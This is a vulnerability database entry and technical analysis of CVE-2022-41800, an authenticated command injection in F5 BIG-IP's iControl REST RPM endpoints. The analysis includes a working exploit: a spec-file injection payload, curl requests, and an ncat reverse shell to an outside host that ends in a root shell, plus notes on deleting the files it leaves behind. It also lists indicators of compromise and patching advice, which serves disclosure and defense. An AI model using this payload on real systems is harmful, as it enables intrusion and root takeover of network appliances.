Attacker Value
Very High
(1 user assessed)
Exploitability
Very Low
(1 user assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
1

CVE-2022-41800

Disclosure Date: December 07, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.  

Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very Low
Technical Analysis

This permits a user who already has an administrator account to create a shell on the target device. There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer which is kind of a big deal.

CVSS V3 Severity and Metrics
Base Score:
8.7 High
Impact Score:
5.8
Exploitability Score:
2.3
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
None

General Information

Vendors

  • f5

Products

  • big-ip access policy manager,
  • big-ip access policy manager 17.0.0,
  • big-ip advanced firewall manager,
  • big-ip analytics,
  • big-ip analytics 17.0.0,
  • big-ip application acceleration manager,
  • big-ip application acceleration manager 17.0.0,
  • big-ip application security manager,
  • big-ip application security manager 17.0.0,
  • big-ip domain name system,
  • big-ip domain name system 17.0.0,
  • big-ip fraud protection service,
  • big-ip fraud protection service 17.0.0,
  • big-ip global traffic manager,
  • big-ip global traffic manager 17.0.0,
  • big-ip link controller,
  • big-ip link controller 17.0.0,
  • big-ip local traffic manager,
  • big-ip local traffic manager 17.0.0,
  • big-ip policy enforcement manager,
  • big-ip policy enforcement manager 17.0.0

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis

Description

On November 16, 2022, F5 released an advisory in F5 Big-IP related to several vulnerabilities, including CVE-2022-41800, which is an authenticated remote code execution vulnerability in the iControl RPC interface.

CVE-2022-41800 requires valid administrative credentials (or an authorization bypass such as CVE-2022-1388) to exploit, as well as network-level access to the management interface, so it is unlikely to see widespread exploitation. We did create a Metasploit module to test your own devices, however.

The affected products are detailed in the vendor’s writeup. We tested these against F5 Big-IP 17.0.0.1.

Technical analysis

F5 Big-IP’s JSON API has an administrator-only endpoint that creates an RPM specification file (.rpmspec) that is consumed by another administrator-only endpoint to create an RPM file. These endpoints are vulnerable to an injection attack into the RPM spec file, where additional fields can be added to the spec using newlines; notably, we can add executable shell commands that run when the resulting RPM file is created. This gives authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands in an unexpected way.

To demonstrate the vulnerability, we developed this JSON payload:

{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
    "summary": "test9"
  }
}

Note the newlines and %check in the description field, which according to the documentation is typically used to run tests. We send that JSON as part of an authenticated request to /rpm-spec-creator:

$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}

The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:

$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <support@f5.com>

%description
test8

%check
ncat -e /bin/bash 10.0.0.179 4444

[...]

We start our listener on the host/port specified in the ncat command:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And build the RPM with /build-package (using jq to format the output):

$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFile
Path": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq

{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}

Then verify that we get a root in shell on our listener:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:58068.

whoami
root

IOCs

When exploiting this vulnerability, two files are potentially created:

  • /var/config/rest/node/tmp/<random uuid>.spec
  • /var/config/rest/node/tmp/RPMS/noarch/<name>.noarch.rpm

The latter can be prevented if the %check we inject exits with an error code, only creating the .spec file, but that creates a log entry. In our Metasploit module, we remove both files as soon as we obtain a session.

Any access to the pair of RPM endpoints should also be considered suspicious, although they do have benign uses:

  • /mgmt/shared/iapp/build-package
  • /mgmt/shared/iapp/rpm-spec-creator

Additional files that may log this attack are:

  • /var/log/restjavad.*.log contains error messages if the build fails (which doesn’t necessarily happen)
  • /var/log/restjavad-audit.*.log is an access log, and will show those endpoints being accessed (which might be benign)
  • /var/log/restnoded/restnoded*.log also shows the endpoints being accessed

Guidance

Administrators should patch their F5 Big-IP devices as per the guidance from the vendor. Additionally, organizations should ensure that the management interface for F5 Big-IP is not easily accessible on the network level.

References